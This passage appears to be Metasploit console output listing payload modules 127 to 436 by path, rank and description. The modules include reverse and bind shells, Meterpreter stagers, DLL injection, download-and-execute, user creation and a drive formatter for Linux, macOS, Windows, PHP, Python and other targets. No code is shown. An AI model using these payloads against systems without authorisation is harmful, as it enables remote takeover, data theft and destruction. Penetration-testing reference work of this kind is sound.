linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 128 linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 129 linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 130 linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + 131 linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 132 linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 133 linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 134 linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 135 linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline + 136 linux/armle/adduser normal No Linux Add User + 137 linux/armle/exec normal No Linux Execute Command + 138 linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager + 139 linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 140 linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 141 linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 142 linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 143 linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager + 144 linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + 145 linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline + 146 linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 147 linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 148 linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 149 linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 150 linux/mipsbe/exec normal No Linux Execute Command + 151 linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 152 linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 153 linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 154 linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 155 linux/mipsbe/reboot normal No Linux Reboot + 156 linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 157 linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 158 linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 159 linux/mipsle/exec normal No Linux Execute Command + 160 linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 161 linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 162 linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 163 linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 164 linux/mipsle/reboot normal No Linux Reboot + 165 linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 166 linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 167 linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 168 linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 169 linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 170 linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 171 linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 172 linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline + 173 linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 174 linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 175 linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline + 176 linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 177 linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 178 linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 179 linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 180 linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 181 linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 182 linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 183 linux/x64/exec normal No Linux Execute Command + 184 linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager + 185 linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager + 186 linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 187 linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 188 linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 189 linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager + 190 linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 191 linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6) + 192 linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 193 linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + 194 linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline + 195 linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6) + 196 linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 197 linux/x86/adduser normal No Linux Add User + 198 linux/x86/chmod normal No Linux Chmod + 199 linux/x86/exec normal No Linux Execute Command + 200 linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) + 201 linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) + 202 linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager + 203 linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) + 204 linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) + 205 linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager + 206 linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) + 207 linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager + 208 linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager + 209 linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager + 210 linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 211 linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 212 linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 213 linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP + 214 linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline + 215 linux/x86/read_file normal No Linux Read File + 216 linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + 217 linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + 218 linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager + 219 linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) + 220 linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + 221 linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager + 222 linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) + 223 linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager + 224 linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 225 linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager + 226 linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) + 227 linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 228 linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + 229 linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline + 230 linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline + 231 linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 232 linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) + 233 linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 234 linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 235 linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 236 mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline + 237 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) + 238 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) + 239 netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager + 240 nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) + 241 nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) + 242 nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) + 243 osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager + 244 osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager + 245 osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + 246 osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + 247 osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline + 248 osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline + 249 osx/armle/vibrate normal No Apple iOS iPhone Vibrate + 250 osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + 251 osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager + 252 osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + 253 osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + 254 osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + 255 osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager + 256 osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager + 257 osx/x64/exec normal No OS X x64 Execute Command + 258 osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager + 259 osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager + 260 osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline + 261 osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline + 262 osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline + 263 osx/x64/say normal No OS X x64 say Shellcode + 264 osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP + 265 osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline + 266 osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP + 267 osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager + 268 osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager + 269 osx/x86/exec normal No OS X Execute Command + 270 osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager + 271 osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager + 272 osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + 273 osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline + 274 osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + 275 osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager + 276 osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager + 277 osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline + 278 osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline + 279 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) + 280 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 + 281 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) + 282 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 + 283 php/download_exec normal No PHP Executable Download and Execute + 284 php/exec normal No PHP Execute Command + 285 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager + 286 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 + 287 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support + 288 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support + 289 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager + 290 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager + 291 php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline + 292 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) + 293 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) + 294 php/shell_findsock normal No PHP Command Shell, Find Sock + 295 python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager + 296 python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support + 297 python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager + 298 python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager + 299 python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager + 300 python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager + 301 python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support + 302 python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline + 303 python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline + 304 python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline + 305 python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline + 306 python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) + 307 python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) + 308 python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) + 309 python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) + 310 r/shell_bind_tcp normal No R Command Shell, Bind TCP + 311 r/shell_reverse_tcp normal No R Command Shell, Reverse TCP + 312 ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP + 313 ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 + 314 ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP + 315 ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL + 316 solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + 317 solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline + 318 solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + 319 solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + 320 solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline + 321 solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + 322 tty/unix/interact normal No Unix TTY, Interact with Established Connection + 323 windows/adduser normal No Windows Execute net user /ADD + 324 windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager + 325 windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager + 326 windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) + 327 windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 328 windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager + 329 windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) + 330 windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) + 331 windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 332 windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) + 333 windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager + 334 windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager + 335 windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) + 336 windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy + 337 windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) + 338 windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) + 339 windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) + 340 windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager + 341 windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager + 342 windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) + 343 windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 344 windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 345 windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support + 346 windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support + 347 windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) + 348 windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution + 349 windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute + 350 windows/exec normal No Windows Execute Command + 351 windows/format_all_drives manual No Windows Drive Formatter + 352 windows/loadlibrary normal No Windows LoadLibrary Path + 353 windows/messagebox normal No Windows MessageBox + 354 windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager + 355 windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager + 356 windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + 357 windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 358 windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager + 359 windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) + 360 windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) + 361 windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 362 windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + 363 windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager + 364 windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + 365 windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) + 366 windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy + 367 windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) + 368 windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy + 369 windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) + 370 windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager + 371 windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) + 372 windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 373 windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager + 374 windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager + 375 windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) + 376 windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 377 windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 378 windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support + 379 windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support + 380 windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + 381 windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) + 382 windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline + 383 windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline + 384 windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline + 385 windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline + 386 windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) + 387 windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline + 388 windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP + 389 windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline + 390 windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager + 391 windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager + 392 windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) + 393 windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 394 windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager + 395 windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) + 396 windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) + 397 windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 398 windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) + 399 windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager + 400 windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) + 401 windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) + 402 windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) + 403 windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager + 404 windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager + 405 windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) + 406 windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 407 windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 408 windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support + 409 windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support + 410 windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager + 411 windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager + 412 windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) + 413 windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 414 windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager + 415 windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) + 416 windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) + 417 windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 418 windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) + 419 windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager + 420 windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) + 421 windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) + 422 windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 423 windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager + 424 windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager + 425 windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) + 426 windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 427 windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 428 windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support + 429 windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support + 430 windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 431 windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 432 windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager + 433 windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager + 434 windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) + 435 windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 436 windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 